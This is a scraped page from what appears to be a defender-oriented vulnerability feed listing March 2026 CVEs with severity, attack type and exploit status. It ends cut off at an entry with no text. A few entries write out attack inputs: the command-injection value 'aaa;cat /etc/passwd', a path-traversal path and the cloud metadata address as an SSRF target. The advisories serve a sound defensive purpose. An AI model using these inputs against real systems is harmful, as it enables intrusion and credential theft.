THREAT ALERT

EMERGENCY CVE-2026-33017 9.3 Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-33017, CVSS 9.3) in the public flow build API that allows attackers to execute arbitrary Python code by supplying malicious flow data. KEV-listed with public PoC, this vulnerability enables anyone with network access to a Langflow instance to achieve server compromise through the API that builds public flows without authentication. | ACT NOW CVE-2026-3910 8.8 Chrome's V8 JavaScript engine contains an inappropriate implementation (CVE-2026-3910, CVSS 8.8) that allows remote attackers to execute arbitrary code within the browser sandbox via crafted HTML pages. KEV-listed with public PoC, this V8 vulnerability affects all Chromium-based browsers and enables drive-by exploitation through any web page containing malicious JavaScript. | ACT NOW CVE-2026-3909 8.8 Google Chrome's Skia graphics library contains an out-of-bounds write (CVE-2026-3909, CVSS 8.8) enabling remote attackers to perform memory corruption through crafted HTML pages. KEV-listed with public PoC and patches available, this vulnerability in the core graphics rendering engine affects all Chromium-based browsers. | ACT NOW CVE-2025-14558 7.2 The rtsol(8) and rtsold(8) programs do not validate the domain search list options provided in router advertisement messages; the option body is passed to resolvconf(8) unmodified. resolvconf(8) is a shell script which does not validate its input. [CVSS 7.2 HIGH] | EMERGENCY CVE-2026-20131 10.0 Cisco Secure Firewall Management Center (FMC) contains a critical unauthenticated Java deserialization vulnerability (CVE-2026-20131, CVSS 10.0) in its web interface that enables remote code execution as root. KEV-listed with public PoC, this vulnerability allows complete compromise of the central management platform that controls all Cisco firewalls in the organization, enabling attackers to modify security policies, disable protections, and access all network traffic. | EMERGENCY CVE-2026-27971 9.8 RCE in Qwik JavaScript framework <= 1.19.0 via unsafe deserialization in server$ Runtime. EPSS 13.4% with PoC available. | ACT NOW CVE-2026-21385 7.8 A Qualcomm chipset vulnerability (CVE-2026-21385) causes memory corruption through improper integer handling during memory allocation, enabling local privilege escalation to kernel level. KEV-listed and patched, this vulnerability affects Qualcomm-based mobile devices and embedded systems, potentially impacting billions of Android devices globally. | ACT NOW CVE-2026-22719 8.1 VMware Aria Operations contains a command injection vulnerability (CVE-2026-22719, CVSS 8.1) that allows unauthenticated remote attackers to execute arbitrary commands during support-assisted product migration. KEV-listed with patches available, this vulnerability targets the infrastructure monitoring platform that has visibility into the entire virtualized environment. | EMERGENCY CVE-2026-20127 10.0 Cisco Catalyst SD-WAN Controller and Manager contain a critical authentication bypass (CVE-2026-20127, CVSS 10.0) in the peering authentication mechanism that allows unauthenticated remote attackers to obtain full administrative privileges. The vulnerability exists because peering authentication does not properly validate credentials, enabling any attacker with network access to take over the SD-WAN management plane and control the entire WAN fabric. | EMERGENCY CVE-2026-27180 9.8 MajorDoMo home automation platform is vulnerable to unauthenticated remote code execution through supply chain compromise via update URL poisoning. The saverestore module exposes its admin() method without authentication due to improper use of gr() (which reads from $_REQUEST), allowing attackers to redirect update URLs and push malicious code packages. | EMERGENCY CVE-2026-27175 9.8 Unauthenticated OS command injection in MajorDoMo via rc/index.php. EPSS 41.7% — the $param variable is passed unsanitized to shell commands. PoC available. | EMERGENCY CVE-2026-27174 9.8 MajorDoMo home automation platform allows unauthenticated remote code execution through the admin panel's PHP console. An include order bug in panel.class.php causes execution to continue past a redirect() call that lacks an exit statement, allowing unauthenticated requests to reach the PHP code execution functionality in inc_panel_ajax.php. |

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Track vulnerabilities that matter to your stack

Personalized alerts, dashboards, and weekly digests – free.

Trending Now

Critical Watch

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — March 20, 2026

283 CVEs tracked today. 26 Critical, 135 High, 101 Medium, 17 Low.

CVE-2026-29796 CRITICAL CVSS 9.4
Unauthenticated access to OCPP WebSocket endpoints allows remote attackers to impersonate legitimate charging stations and execute arbitrary commands against electric vehicle charging infrastructure without credentials. An attacker can connect using a known station identifier to manipulate charging operations, alter backend data, and escalate privileges across the charging network. No patch is currently available for this critical vulnerability affecting EV charging systems.

Authentication Bypass Privilege Escalation
CVE-2026-25192 CRITICAL CVSS 9.4
Unauthenticated access to OCPP WebSocket endpoints allows remote attackers to impersonate legitimate charging stations and execute arbitrary commands against EV charging infrastructure without credentials. By connecting with a known station identifier, threat actors can manipulate charging operations, escalate privileges, and corrupt backend network data. No patch is currently available for this critical vulnerability affecting charging station deployments.

Authentication Bypass Privilege Escalation
CVE-2026-24060 CRITICAL CVSS 9.1
This vulnerability affects Automated Logic's WebCTRL Premium Server, which transmits BACnet protocol data in cleartext without encryption. An attacker positioned on the network can sniff sensitive service information including File Start Position, File Data, and proprietary PLC update formats using tools like Wireshark, enabling both information disclosure and potential integrity attacks through modification of intercepted traffic. With a CVSS score of 9.1 (Critical) and network-based attack vector requiring no privileges or user interaction, this represents a significant exposure for building automation systems.

Information Disclosure
CVE-2026-33502 CRITICAL CVSS 9.3
An unauthenticated server-side request forgery (SSRF) vulnerability exists in AVideo's Live plugin test.php endpoint that allows remote attackers to force the server to send HTTP requests to arbitrary URLs. The vulnerability affects AVideo installations with the Live plugin enabled and can be exploited to probe internal network services, access cloud metadata endpoints, and retrieve content from internal HTTP resources. A proof-of-concept has been published demonstrating localhost service enumeration, and the vulnerability requires no authentication or user interaction to exploit.

SSRF PHP RCE Apache Nginx
CVE-2026-33494 CRITICAL CVSS 10.0
Ory Oathkeeper, an identity and access proxy, contains an authorization bypass vulnerability via HTTP path traversal that allows attackers to access protected resources without authentication. The vulnerability affects Ory Oathkeeper installations where the software uses un-normalized paths for rule matching, enabling requests like '/public/../admin/secrets' to bypass authentication requirements. With a CVSS score of 10.0 (Critical) and network-based exploitation requiring no privileges or user interaction, this represents a severe authentication bypass, though no current EPSS score or KEV listing indicates limited evidence of active exploitation at this time.

Path Traversal Nginx
CVE-2026-33478 CRITICAL CVSS 10.0
A critical authentication bypass and command injection vulnerability chain in AVideo's CloneSite plugin allows completely unauthenticated remote attackers to achieve full system compromise. The vulnerability affects AVideo installations with the CloneSite plugin enabled, allowing attackers to steal clone authentication keys, dump the entire database including MD5-hashed admin credentials, crack those credentials trivially, and finally execute arbitrary system commands via an rsync command injection. A detailed proof-of-concept demonstrating the complete attack chain is publicly available in the GitHub security advisory, making this an immediate exploitation risk.

RCE Command Injection PHP
CVE-2026-33419 CRITICAL CVSS 9.1
MinIO AIStor's Security Token Service (STS) AssumeRoleWithLDAPIdentity endpoint contains two combined vulnerabilities that enable LDAP credential brute-forcing: distinguishable error messages allowing username enumeration (CWE-204) and missing rate limiting (CWE-307). All MinIO deployments through the final open-source release with LDAP authentication enabled are affected. Unauthenticated network attackers can enumerate valid LDAP usernames, perform unlimited password guessing attacks, and obtain temporary AWS-style STS credentials granting full access to victim users' S3 buckets and objects.

Microsoft Docker Information Disclosure Apple Nginx
CVE-2026-33286 CRITICAL CVSS 9.1
A critical arbitrary method execution vulnerability affects Graphiti's JSONAPI write functionality, allowing attackers to invoke any public method on underlying model instances, classes, or associations through crafted JSONAPI payloads. Applications using Graphiti (a Ruby gem for building JSON:API compliant APIs) that expose write endpoints to untrusted users are affected, particularly versions prior to 1.10.2. The vulnerability scores CVSS 9.1 (Critical) with network-based exploitation requiring no authentication or user interaction, enabling both high integrity and availability impacts.

Information Disclosure
CVE-2026-33136 CRITICAL CVSS 9.3
WeGIA, a web manager for charitable institutions, contains a Reflected Cross-Site Scripting (XSS) vulnerability in the listar_memorandos_ativos.php endpoint affecting versions 3.6.6 and below. An attacker can inject arbitrary JavaScript or HTML into the sccd GET parameter, which is reflected without sanitization when the msg parameter equals 'success', enabling session hijacking, credential theft, and malicious actions in the context of victim users. The vulnerability has a critical CVSS score of 9.3 with changed scope, indicating potential impact beyond the vulnerable component.

XSS PHP
CVE-2026-33135 CRITICAL CVSS 9.3
A Reflected Cross-Site Scripting (XSS) vulnerability exists in WeGIA, a web manager for charitable institutions. Versions 3.6.6 and below are affected through the novo_memorandoo.php endpoint, where an attacker can inject arbitrary JavaScript via the sccs GET parameter without sanitization. This allows execution of malicious scripts in victims' browsers when they click a crafted link, with a critical CVSS score of 9.3 due to cross-site scripting scope and high confidentiality and integrity impact.

XSS PHP
CVE-2026-33134 CRITICAL CVSS 9.3
WeGIA, a web manager for charitable institutions, contains an authenticated SQL injection vulnerability in versions 3.6.5 and below via the id_producto parameter in the restaurar_produto.php endpoint. An authenticated attacker can execute arbitrary SQL commands to fully compromise the database, extracting sensitive donor information, beneficiary records, and administrative credentials. No evidence of active exploitation (not in CISA KEV) is currently available, though proof-of-concept details are publicly disclosed in the GitHub security advisory.

SQLi PHP
CVE-2026-33024 CRITICAL CVSS 9.1
AVideo, a video-sharing platform, contains a Server-Side Request Forgery (SSRF) vulnerability in versions prior to 8.0 affecting the public thumbnail endpoints getImage.php and getImageMP4.php. Unauthenticated attackers can exploit insufficient URL validation to force the server to make requests to internal network resources including cloud metadata endpoints (AWS EC2 169.254.169.254), localhost, and private IP ranges. The vulnerability has a CVSS 4.0 score of 9.3 with network attack vector requiring no privileges or user interaction, though there is no evidence of active exploitation or public proof-of-concept at this time.

SSRF PHP
CVE-2026-32985 CRITICAL CVSS 9.8
Xerte Online Toolkits 3.14 and earlier contain an unauthenticated arbitrary file upload vulnerability allowing remote code execution with a CVSS score of 9.8. The template import functionality at /website_code/php/import/import.php lacks authentication checks, enabling attackers to upload ZIP archives containing malicious PHP files that are extracted to web-accessible directories. This is a critical severity issue with network-based attack vector requiring no privileges or user interaction, and a proof-of-concept has been published by VulnCheck.

PHP Authentication Bypass RCE File Upload
CVE-2026-32945 CRITICAL CVSS 9.8
Heap overflow in PJSIP 2.16 and earlier DNS parser allows unauthenticated remote attackers to achieve code execution with no user interaction required. The vulnerability affects only applications explicitly configured with a built-in nameserver; users relying on OS resolvers or external resolver implementations are unaffected. No patch is currently available, but mitigation is possible by disabling DNS resolution or switching to an external resolver.

Buffer Overflow Heap Overflow
CVE-2026-32940 CRITICAL CVSS 9.3
SiYuan personal knowledge management system contains a cross-site scripting (XSS) vulnerability in versions 3.6.0 and below. An unauthenticated attacker can exploit the /api/icon/getDynamicIcon endpoint by crafting a malicious URL that bypasses SVG sanitization filters, allowing arbitrary JavaScript execution when a victim clicks an injected link within the rendered SVG. The CVSS score of 9.3 indicates critical severity, though exploitation requires user interaction (clicking a malicious link) and the attack complexity is low.

XSS
CVE-2026-32938 CRITICAL CVSS 9.9
SiYuan personal knowledge management system versions 3.6.0 and below contain a path traversal vulnerability that allows authenticated attackers to exfiltrate arbitrary readable files from the system. An attacker with low-level privileges can exploit the /api/lute/html2BlockDOM endpoint to copy sensitive files to the workspace assets directory via malicious file:// links in pasted HTML, then retrieve them through the authenticated GET /assets/ endpoint. This is a critical vulnerability with a CVSS score of 9.9 due to its potential for high confidentiality impact and scope change, though no active exploitation (KEV) or public proof-of-concept has been documented.

Path Traversal
CVE-2026-32891 CRITICAL CVSS 9.0
A stored cross-site scripting (XSS) vulnerability in Anchorr Discord bot versions 1.4.1 and below allows authenticated Jellyseerr users to execute arbitrary JavaScript in admin browser sessions. The XSS payload can exfiltrate the full application configuration including session tokens and API keys for integrated services (Jellyfin, Jellyseerr, Discord), enabling complete account takeover across all connected platforms without requiring admin credentials. This vulnerability is tagged as XSS in ENISA's database (EUVD-2026-13503) with a CVSS score of 9.0, though no EPSS score, KEV listing, or public POC availability is reported in the provided data.

XSS
CVE-2026-32890 CRITICAL CVSS 9.6
A stored Cross-site Scripting (XSS) vulnerability exists in the Anchorr Discord bot's web dashboard User Mapping dropdown that allows any unprivileged Discord user in the configured guild to execute arbitrary JavaScript in an administrator's browser. This can be chained with an unauthenticated API endpoint (/api/config) to exfiltrate all stored credentials including Discord tokens, Jellyfin API keys, Jellyseerr API keys, JWT secrets, webhook secrets, and bcrypt password hashes. The vulnerability affects Anchorr versions 1.4.1 and below, with a critical CVSS score of 9.6 indicating network-based exploitation with low complexity and no authentication required.

XSS
CVE-2026-32817 CRITICAL CVSS 9.1
Admidio versions 5.0.0 through 5.0.6 contain a critical authorization bypass vulnerability in the documents and files module that allows unauthorized deletion of folders and files. When the module is configured in public mode, unauthenticated attackers can permanently destroy the entire document library via simple HTTP GET requests without CSRF protection. The vulnerability combines missing authorization checks (CWE-862) with CSRF weaknesses, resulting in a CVSS score of 9.1 (Critical) with network-based attack vector requiring no privileges or user interaction.

CSRF PHP Authentication Bypass
CVE-2026-32666 HIGH CVSS 7.5
WebCTRL Premium Server systems contain an authentication bypass vulnerability arising from BACnet protocol's inherent lack of network layer authentication, compounded by WebCTRL's failure to implement additional validation. An attacker with network access can spoof BACnet packets targeting either the WebCTRL server or associated AutomatedLogic controllers, which will process the spoofed packets as legitimate traffic. This vulnerability has a CVSS score of 7.5 with high integrity impact and is disclosed through ICS-CERT advisory ICSA-26-078-08.

Authentication Bypass
CVE-2026-32663 HIGH CVSS 7.3
A session management vulnerability exists in the WebSocket backend of IGL Technologies' eparking.fi platform that allows multiple endpoints to connect using the same charging station identifier. An unauthenticated remote attacker can hijack legitimate charging station sessions by connecting with predictable session identifiers, enabling them to intercept backend commands, authenticate as other users, or cause denial-of-service by overwhelming the backend with concurrent session requests. This vulnerability affects operational technology (OT) infrastructure and has been disclosed by CISA ICS-CERT.

Authentication Bypass
CVE-2026-31904 HIGH CVSS 7.5
The CTEK ChargePortal WebSocket API contains a critical rate limiting vulnerability that permits unlimited authentication attempts. This flaw enables attackers to either launch denial-of-service attacks by overwhelming the system with authentication requests that suppress legitimate charger telemetry data, or conduct brute-force attacks to compromise user credentials and gain unauthorized system access. With a CVSS score of 7.5 and network-based attack vector requiring no privileges, this poses significant risk to electric vehicle charging infrastructure operators.

Authentication Bypass
CVE-2026-31903 HIGH CVSS 7.5
The WebSocket API in iGL Technologies' eparking.fi platform lacks rate limiting on authentication requests, enabling attackers to conduct brute-force attacks to gain unauthorized access or launch denial-of-service attacks that suppress or mis-route legitimate electric vehicle charger telemetry data. This vulnerability affects internet-accessible systems with no authentication required and low attack complexity (CVSS 7.5). There is no current evidence of active exploitation (not in CISA KEV) or public proof-of-concept code, though the issue has been disclosed through CISA ICS-CERT advisory ICSA-26-078-08.

Authentication Bypass
CVE-2026-27649 HIGH CVSS 7.3
A session management vulnerability in CTEK ChargePortal's WebSocket backend allows attackers to hijack charging station sessions by connecting with the same predictable session identifier used by legitimate stations. This enables authentication bypass, interception of backend commands intended for legitimate charging stations, and denial-of-service through session flooding. The vulnerability affects CTEK ChargePortal with a CVSS score of 7.3 and is documented in ICS-CERT advisory ICSA-26-078-06, though no active exploitation (KEV) or public POC has been reported.

Authentication Bypass
CVE-2026-25086 HIGH CVSS 7.7
WebCTRL Premium Server contains a port binding vulnerability that allows an attacker with local access to bind to the same network port used by the WebCTRL service. This enables the attacker to send malicious packets and impersonate the legitimate WebCTRL service without injecting code into the application, potentially compromising confidentiality and integrity of building automation system communications. The vulnerability affects Automated Logic's WebCTRL Premium Server and has been disclosed by ICS-CERT, though no KEV listing or public POC is currently documented.

Code Injection
CVE-2026-22898 CRITICAL CVSS 9.3
QVR Pro contains a missing authentication vulnerability (CWE-306) that allows remote attackers to access critical functions without proper credential validation, potentially gaining unauthorized system access. All versions prior to QVR Pro 2.7.4.14 are affected. This authentication bypass vulnerability enables unauthenticated remote exploitation of a surveillance management platform, representing a direct threat to organizations relying on QVR Pro for video recording and system administration.

Qnap Authentication Bypass Qvr Pro
CVE-2026-22172 CRITICAL CVSS 9.9
OpenClaw contains an authorization bypass vulnerability in its WebSocket connection handling that allows authenticated users with low-privilege shared-token or password credentials to falsely declare elevated administrative scopes without proper server-side validation. Attackers with basic authentication can escalate privileges to operator.admin level and execute administrative gateway operations. With a CVSS score of 9.9 (Critical) and low attack complexity, this represents a severe privilege escalation risk, though no KEV listing or EPSS data is currently available to confirm active exploitation.

Authentication Bypass
CVE-2026-21992 CRITICAL CVSS 9.8
A critical authentication bypass vulnerability in Oracle Identity Manager and Oracle Web Services Manager allows remote attackers to completely compromise affected systems without any credentials. The vulnerability resides in the REST WebServices and Web Services Security components, affecting versions 12.2.1.4.0 and 14.1.2.1.0 of both products. With a CVSS score of 9.8 and no authentication required, this represents a severe risk to identity management infrastructure, though no current KEV listing or public POC has been documented in available sources.

Oracle Authentication Bypass
CVE-2026-21732 CRITICAL CVSS 9.6
GPU shader compiler memory corruption via malicious shader code allows remote code execution when the compiler runs with elevated privileges, affecting multiple platforms through crafted switch statements that trigger out-of-bounds writes. An attacker can exploit this vulnerability by delivering specially-crafted GPU shader code through a web page, potentially gaining system-level control on vulnerable devices. No patch is currently available for this critical vulnerability.

Buffer Overflow Memory Corruption
CVE-2026-4038 CRITICAL CVSS 9.8
The Aimogen Pro plugin for WordPress contains an arbitrary function call vulnerability allowing unauthenticated attackers to execute privileged WordPress functions without authorization. All versions up to and including 2.7.5 are affected, enabling attackers to modify critical site settings such as changing the default user registration role to administrator, then registering as an admin to gain full site control. This is a critical authentication bypass with privilege escalation rated 9.8 CVSS, though no active exploitation (KEV) or public proof-of-concept has been reported at this time.

WordPress Privilege Escalation Authentication Bypass
CVE-2026-3584 CRITICAL CVSS 9.8
The Kali Forms plugin for WordPress contains a critical remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary code on the server. All versions up to and including 2.4.9 are affected, including the popular 'Kali Forms - Contact Form & Drag-and-Drop Builder' plugin by WPChill. The vulnerability carries a critical CVSS score of 9.8 due to its network-based attack vector, low complexity, and lack of required authentication or user interaction.

WordPress RCE Code Injection
CVE-2024-44722 CRITICAL CVSS 9.8
SysAK v2.0 and before is vulnerable to command execution via aaa;cat /etc/passwd. Rated critical severity (CVSS 9.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

Code Injection RCE
CVE-2026-33509 HIGH CVSS 7.5
Remote code execution in Python allows authenticated users with SETTINGS permission to modify the reconnect.script configuration parameter without restriction, which is then passed unsanitized to subprocess.run() enabling arbitrary command execution. The vulnerability exists due to insufficient input validation in the set_config_value() API endpoint, which only restricts the general.storage_folder setting while leaving other security-critical options like reconnect.script unprotected. An attacker with non-admin SETTINGS privileges can exploit this to achieve full system compromise on the affected Python installation.

Python RCE Privilege Escalation
CVE-2026-33508 HIGH CVSS 8.2
Parse Server's LiveQuery component fails to enforce query depth limits on WebSocket subscription requests, allowing attackers to send deeply nested logical operators that trigger excessive recursion and CPU consumption. This affects Parse Server deployments where the LiveQuery WebSocket endpoint is accessible to untrusted clients (pkg:npm/parse-server). A patch is available from the vendor with no known workarounds, and while no EPSS score or KEV listing is present, the availability of proof-of-concept code in the patch references suggests exploitation details are publicly documented.

Information Disclosure
CVE-2026-33507 HIGH CVSS 8.8
A Cross-Site Request Forgery (CSRF) vulnerability in the AVideo platform's plugin upload endpoint allows unauthenticated attackers to achieve Remote Code Execution by tricking authenticated administrators into visiting a malicious webpage. The vulnerability combines missing CSRF token validation on the pluginImport.json.php endpoint with explicitly configured SameSite=None session cookies over HTTPS, enabling cross-origin session hijacking. A proof-of-concept exploit has been published demonstrating full compromise by uploading a malicious plugin containing a PHP webshell.

PHP RCE CSRF Command Injection Path Traversal
CVE-2026-33505 HIGH CVSS 7.2
Ory Keto, an open-source authorization service, contains a SQL injection vulnerability in its GetRelationships API due to insecure pagination token handling. Attackers who know or can exploit the default hard-coded pagination encryption secret can craft malicious tokens to execute arbitrary SQL queries. The CVSS score of 7.2 reflects high privileges required (PR:H), though the actual risk is elevated when default secrets remain unchanged in production deployments.

SQLi OpenSSL
CVE-2026-33504 HIGH CVSS 7.2
Ory Hydra, an OAuth 2.0 and OpenID Connect provider, contains a SQL injection vulnerability in three admin APIs (listOAuth2Clients, listOAuth2ConsentSessions, listTrustedOAuth2JwtGrantIssuers) due to insecure pagination token handling. Attackers who know the pagination secret can craft malicious encrypted tokens to execute arbitrary SQL queries. The CVSS score of 7.2 requires high privileges (PR:H), but successful exploitation grants full database access with high confidentiality, integrity, and availability impact.

SQLi OpenSSL
CVE-2026-33503 HIGH CVSS 7.2
Ory Kratos, an open-source identity and user management system, contains a SQL injection vulnerability in its ListCourierMessages Admin API through malicious pagination tokens. Attackers who know or can exploit the default pagination encryption secret can craft tokens to execute arbitrary SQL queries against the backend database. The vulnerability requires high privileges (PR:H) but is network-exploitable (AV:N) with low complexity (AC:L), scoring CVSS 7.2.

SQLi OpenSSL
CVE-2026-33498 HIGH CVSS 8.7
Parse Server is vulnerable to a permanent denial-of-service attack that bypasses the previous CVE-2026-32944 fix. An unauthenticated attacker can send a specially crafted HTTP request containing deeply nested query structures with logical operators to permanently hang the Parse Server process, requiring manual restart. This affects parse-server npm package installations, and patches are available from the vendor.

Authentication Bypass
CVE-2026-33497 HIGH CVSS 7.5
Path traversal in Langflow's /profile_pictures endpoint allows unauthenticated remote attackers to read the application's secret_key through directory traversal in the folder_name parameter. Since the secret_key is used for JWT authentication, attackers can forge valid tokens to gain unauthorized system access. Public exploit code exists for this vulnerability and no patch is currently available.

Path Traversal
CVE-2026-33496 HIGH CVSS 8.1
Ory Oathkeeper contains a cache key confusion vulnerability in its oauth2_introspection authenticator that allows attackers to bypass authentication by reusing tokens across different introspection servers. Attackers with a valid token for one configured introspection server can exploit the cache mechanism to gain unauthorized access to resources protected by different introspection servers. This vulnerability requires the specific precondition of multiple oauth2_introspection authenticators with caching enabled, and a patch is available from the vendor.

Authentication Bypass
CVE-2026-33493 HIGH CVSS 7.1
The AVideo platform contains a path traversal vulnerability in the objects/import.json.php endpoint that allows authenticated users with upload permissions to bypass directory restrictions and access any MP4 file on the filesystem. Attackers can steal private videos from other users, read adjacent text/HTML files containing video metadata, and delete video files if writable by the web server. A detailed proof-of-concept is publicly available in the GitHub security advisory, and the vulnerability affects all instances where authenticated users have upload permissions, which is the default configuration.

Path Traversal PHP
CVE-2026-33492 HIGH CVSS 7.3
AVideo, an open-source video platform, contains a session fixation vulnerability that allows attackers to hijack user sessions and achieve full account takeover. The flaw affects the AVideo Composer package (pkg:composer/wwbn_avideo) and stems from accepting arbitrary session IDs via URL parameters, bypassing session regeneration for specific endpoints, and disabled session regeneration during login. A public proof-of-concept exploit is available in the GitHub security advisory, and the vulnerability requires only low privileges (authenticated attacker) and user interaction (victim clicking a malicious link), making it highly exploitable.

Session Fixation PHP CSRF Privilege Escalation
CVE-2026-33488 HIGH CVSS 7.4
The LoginControl plugin for AVideo contains a critical cryptographic weakness in its PGP-based 2FA implementation, generating 512-bit RSA keys that can be factored on commodity hardware within hours using publicly available tools. Attackers who obtain a user's public key can derive the complete private key and decrypt authentication challenges, completely bypassing the second factor protection. A proof-of-concept demonstrating key factoring and challenge decryption is included in the advisory, and unauthenticated endpoints allow anonymous CPU-intensive key generation for denial-of-service attacks.

PHP Denial Of Service Python
CVE-2026-33485 HIGH CVSS 7.5
An unauthenticated SQL injection vulnerability exists in the AVideo platform's RTMP on_publish callback, allowing remote attackers to extract the entire database via time-based blind SQL injection. The vulnerability affects the wwbn_avideo composer package and can be exploited without authentication to steal user password hashes, email addresses, and API keys. A detailed proof-of-concept is publicly available in the GitHub Security Advisory, and the vulnerability has a CVSS score of 7.5 (High) with network attack vector and low complexity.

SQLi PHP Information Disclosure
CVE-2026-33484 HIGH CVSS 7.5
The Langflow Python package contains an authentication bypass vulnerability in its image file download endpoint that allows unauthenticated attackers to access image files uploaded by any user. Langflow, a visual framework for building AI applications, fails to enforce authentication and ownership checks on the /api/v1/files/images/{flow_id}/{file_name} endpoint, while all other file operation endpoints properly implement these security controls. A proof-of-concept exploit exists demonstrating that any attacker with knowledge of a flow UUID and filename can retrieve sensitive image data without credentials, posing a critical risk in multi-tenant deployments where cross-tenant data leakage can occur.

Authentication Bypass
CVE-2026-33483 HIGH CVSS 7.5
AVideo platform contains an unauthenticated file upload vulnerability in the aVideoEncoderChunk.json.php endpoint that allows remote attackers to exhaust disk space and cause denial of service. Any unauthenticated attacker can upload arbitrarily large files to the server's /tmp directory with no size limits, rate limiting, or cleanup mechanism, and the CORS wildcard header enables browser-based distributed attacks. A detailed proof-of-concept is publicly available demonstrating parallel upload attacks that can fill disk space and crash server services.

Denial Of Service Information Disclosure PHP
CVE-2026-33482 HIGH CVSS 8.1
Remote code execution in PHP ffmpeg integration allows unauthenticated attackers to execute arbitrary OS commands on standalone encoder servers by bypassing incomplete input sanitization that fails to filter bash command substitution syntax. The vulnerable `sanitizeFFmpegCommand()` function strips common shell metacharacters but permits `$()` notation, which can be injected through crafted encrypted payloads and executed in a double-quoted shell context. No patch is currently available.

RCE PHP Command Injection
CVE-2026-33480 HIGH CVSS 8.6
AVideo, an open-source video platform, contains a server-side request forgery (SSRF) vulnerability that allows unauthenticated attackers to bypass URL validation using IPv4-mapped IPv6 addresses (::ffff:x.x.x.x format). The vulnerable endpoint plugin/LiveLinks/proxy.php can be exploited to access cloud metadata services (AWS, GCP, Azure), internal networks, and localhost services without authentication. A detailed proof-of-concept is publicly available demonstrating credential theft from AWS instance metadata, making this a critical risk for cloud-hosted installations.

SSRF PHP Microsoft Redis
CVE-2026-33479 HIGH CVSS 8.8
The Gallery plugin in AVideo contains an unauthenticated remote code execution vulnerability through CSRF-enabled PHP code injection. Attackers can exploit an eval() function that directly executes unsanitized user input by tricking an admin into visiting a malicious page, with the session cookie's SameSite=None configuration enabling cross-site request forgery. A detailed proof-of-concept exploit exists demonstrating command execution through crafted form submissions.

PHP RCE CSRF Code Injection
CVE-2026-33476 HIGH CVSS 7.5
An unauthenticated directory traversal vulnerability exists in Siyuan kernel's /appearance/ endpoint, allowing remote attackers to read arbitrary files accessible to the server process without authentication. The vulnerability affects the Go-based Siyuan note-taking application (github.com/siyuan-note/siyuan/kernel) and has been assigned a CVSS score of 7.5 (High). A working proof-of-concept exploit is publicly available demonstrating successful file retrieval via crafted URLs containing path traversal sequences, and a patch has been released by the vendor.

Information Disclosure Authentication Bypass Path Traversal Microsoft Docker
CVE-2026-33468 HIGH CVSS 8.1
Kysely, a TypeScript SQL query builder for Node.js, contains a SQL injection vulnerability in its MySQL dialect due to incomplete string escaping in the DefaultQueryCompiler.sanitizeStringLiteral() method. Applications using kysely (npm package) with MySQL that pass user-controlled input to CreateIndexBuilder.where() or CreateViewBuilder.as() methods are vulnerable to SQL injection attacks that can lead to data exfiltration, modification, or authentication bypass. A proof-of-concept exploit is publicly available demonstrating how backslash-escaped single quotes bypass the sanitization logic when NO_BACKSLASH_ESCAPES is disabled (MySQL default).

SQLi Authentication Bypass
CVE-2026-33442 HIGH CVSS 8.1
SQL injection in PostgreSQL via unsafe backslash handling in Kysely's query compiler allows unauthenticated remote attackers to execute arbitrary SQL commands by injecting backslashes into JSON path string literals that bypass quote escaping. The vulnerability affects systems using the default BACKSLASH_ESCAPES SQL mode, where attackers can break out of sanitized JSON path expressions through specially crafted input. No patch is currently available.

SQLi PostgreSQL
CVE-2026-33427 HIGH CVSS 7.5
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an authorization page spoofing vulnerability that allows unauthenticated attackers to inject attacker-controlled domains into legitimate Discourse authorization pages, enabling social engineering attacks. This CWE-862 (Missing Authorization) class vulnerability affects all affected Discourse installations and requires no authentication or special privileges to exploit. No active exploitation in the wild (KEV status) has been reported, but the attack surface is broad given Discourse's widespread use as an open-source discussion platform.

Authentication Bypass
CVE-2026-33421 HIGH CVSS 7.1
Parse Server's LiveQuery WebSocket interface contains an authorization bypass vulnerability that allows any authenticated user to subscribe to real-time object updates regardless of Class-Level Permission pointer field restrictions. Affected products include the parse-server npm package, where authenticated attackers can receive real-time updates for all objects in classes that should be restricted by readUserFields and pointerFields CLP settings, bypassing intended access controls that are correctly enforced in the REST API. No public proof-of-concept or active exploitation (KEV) has been reported at this time.

Information Disclosure Authentication Bypass
CVE-2026-33418 HIGH CVSS 7.5
A regex-based bypass vulnerability in the @dicebear/converter npm package allows attackers to circumvent SVG dimension sanitization by injecting decoy <svg tags in XML constructs. Applications using @dicebear/converter on Node.js to process untrusted SVG input are vulnerable to denial of service through unbounded memory allocation when rendering malformed SVGs. The CVSS score of 7.5 reflects the high availability impact with network-accessible attack vector requiring no authentication or user interaction.

Denial Of Service Node.js
CVE-2026-33413 HIGH CVSS 8.8
This is an authentication and authorization bypass vulnerability in etcd's gRPC API layer that allows unauthorized users to execute privileged operations when etcd auth is enabled. Affected are etcd versions prior to 3.4.42, 3.5.28, and 3.6.9 (specifically the Go packages go.etcd.io/etcd/v3 and go.etcd.io/etcd). Attackers can enumerate cluster topology via MemberList, trigger denial of service through Alarm APIs, manipulate Lease operations affecting TTL-based keys, and force compaction to permanently delete historical data. Standard Kubernetes deployments are not affected as they do not rely on etcd's built-in authentication. No EPSS score or KEV listing is currently available, and the vulnerability was responsibly disclosed by multiple security researchers.

Kubernetes Denial Of Service Authentication Bypass
CVE-2026-33331 HIGH CVSS 8.2
A Stored Cross-Site Scripting (XSS) vulnerability exists in the orpc OpenAPI documentation generation functionality, affecting the @orpc/openapi npm package. Attackers who can control OpenAPI specification fields (such as info.description) can inject malicious JavaScript that executes when users view the generated API documentation. A working proof-of-concept exists demonstrating payload injection through specification metadata fields, and while CVSS scores this at 8.2 (High), the network-accessible attack vector with no privileges required increases real-world risk.

XSS
CVE-2026-33316 HIGH CVSS 8.1
